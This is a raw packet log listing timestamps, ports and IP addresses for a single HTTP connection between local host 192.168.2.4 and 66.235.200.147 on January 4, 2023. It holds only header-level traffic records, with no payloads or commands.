Jan 4, 2023 16:47:45.311602116 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.315659046 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.315701008 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.315721035 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.315745115 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.315773010 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.315817118 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.316082001 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.316112041 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.316138029 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.316157103 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.316170931 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.316195011 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.316196918 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.316219091 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.316225052 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.316243887 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.316251993 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.316262007 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.316279888 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.316306114 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.316319942 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.316332102 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.316349983 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.316359043 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.316384077 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.316385984 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.316406012 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.316412926 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.316427946 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.316438913 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.316447973 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.316473961 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.316478014 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.316500902 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.316514015 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.316528082 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.316553116 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.316566944 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.316579103 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.316596031 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.316607952 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.316631079 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.316643953 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.316648960 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.316672087 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.316684008 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.316698074 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.316711903 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.316720963 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.316740990 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.316747904 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.316761017 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.316773891 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.316790104 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.316802979 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.316816092 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.316837072 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.316854000 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.316863060 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.316874027 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.316890955 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.316905022 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.316915035 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.316930056 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.316941023 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.316953897 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.316966057 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.316982985 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.316992044 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.317007065 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.317019939 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.317034006 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.317049026 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.317060947 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.317074060 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.317100048 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.317115068 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.317131996 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.317146063 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.317158937 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.317174911 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.317188978 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.317194939 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.317217112 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.317243099 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.317257881 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.317271948 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.317295074 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.317301989 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.317327023 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.317337990 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.317347050 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.317365885 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.317390919 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.317405939 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.317414045 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.317435026 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.317435980 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.317461014 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.317467928 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.317487001 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.317488909 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.317513943 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.317513943 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.317533970 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.317542076 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.317563057 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.317590952 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.317595005 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.317622900 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.317622900 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.317648888 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.317651987 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.317672968 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.317677021 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.317696095 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.317704916 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.317719936 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.317730904 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.317744970 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.317754030 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.317774057 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.317780972 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.317794085 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.317807913 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.317831993 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.317852974 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.317854881 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.317881107 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.317887068 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.317910910 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.317917109 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.317938089 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.317939997 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.317961931 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.317970037 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.317981958 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.317998886 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.318011999 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.318025112 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.318038940 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.318052053 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.318065882 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.318079948 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.318094969 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.318106890 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.318121910 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.318134069 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.318144083 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.318161011 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.318186045 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.318202019 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.318209887 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.318233013 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.318238974 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.318263054 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.318268061 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.318283081 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.318295002 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.318304062 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.318321943 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.318335056 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.318350077 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.318362951 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.318370104 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.318387032 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.318396091 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.318408966 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.318423033 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.318439007 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.318449020 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.318465948 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.318476915 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.318490028 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.318504095 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.318519115 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.318531990 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.318546057 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.318557978 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.318569899 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.318579912 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.318600893 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.318603039 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.318622112 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.318624020 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.318645000 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.318645000 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.318666935 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.318669081 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.318697929 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.318708897 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.318712950 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.318730116 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.318749905 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.318751097 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.318769932 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.318775892 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.318790913 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.318790913 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.318814993 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.318821907 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.318834066 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.318847895 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.318871021 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.318887949 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.318895102 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.318918943 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.318918943 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.318948030 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.318949938 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.318972111 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.318974972 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.318996906 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.319000006 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.319017887 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.319025993 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.319040060 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.319053888 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.319070101 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.319077969 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.319087029 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.319104910 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.319130898 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.319145918 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.319154978 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.319175959 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.319183111 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.319205999 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.319211006 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.319227934 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.319236994 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.319247961 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.319266081 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.319293022 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.319307089 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.319317102 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.319338083 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.319341898 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.319365025 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.319366932 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.319390059 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.319391012 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.319412947 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.319416046 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.319433928 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.319442034 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.319456100 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.319464922 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.319484949 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.319489956 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.319503069 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.319518089 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.319533110 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.319541931 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.319552898 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.319562912 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.319586039 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.319586992 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.319602966 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.319613934 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.319632053 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.319644928 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.319648981 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.319673061 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.319684982 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.319700956 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.319711924 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.319729090 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.319753885 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.319768906 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.319780111 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.319801092 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.319803953 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.319820881 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.319834948 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.319840908 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.319856882 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.319875002 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.319891930 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.319901943 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.319925070 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.319946051 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.319947004 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.319947004 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.319967031 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.319967031 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.319989920 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.320000887 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.320008993 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.320024967 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.320050955 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.320065022 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.320076942 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.320094109 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.320103884 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.320126057 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.320127964 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.320147991 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.320158958 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.320185900 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.320197105 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.320211887 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.320229053 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.320238113 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.320262909 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.320288897 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.320293903 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.320314884 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.320316076 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.320328951 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.320342064 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.320363045 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.320374966 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.320383072 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.320404053 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.320437908 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.320450068 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.320462942 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.320477009 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.320488930 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.320506096 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.320513010 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.320528030 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.320539951 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.320555925 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.320564032 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.320580006 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.320590973 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.320605040 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.320620060 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.320652962 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.320662975 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.320678949 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.320693970 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.320707083 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.320727110 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.320727110 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.320746899 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.320750952 CET	49696	80	192.168.2.4	66.235.200.147
